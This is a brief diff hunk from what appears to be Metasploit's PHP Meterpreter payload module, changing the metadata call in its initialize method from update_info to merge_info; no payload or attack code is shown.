@@ -10,7 +10,7 @@ module MetasploitModule
 
   def initialize(info = {})
     super(
-      update_info(
+      merge_info(
         info,
         'Name' => 'PHP Meterpreter',
         'Description' => 'Run a meterpreter server in PHP',
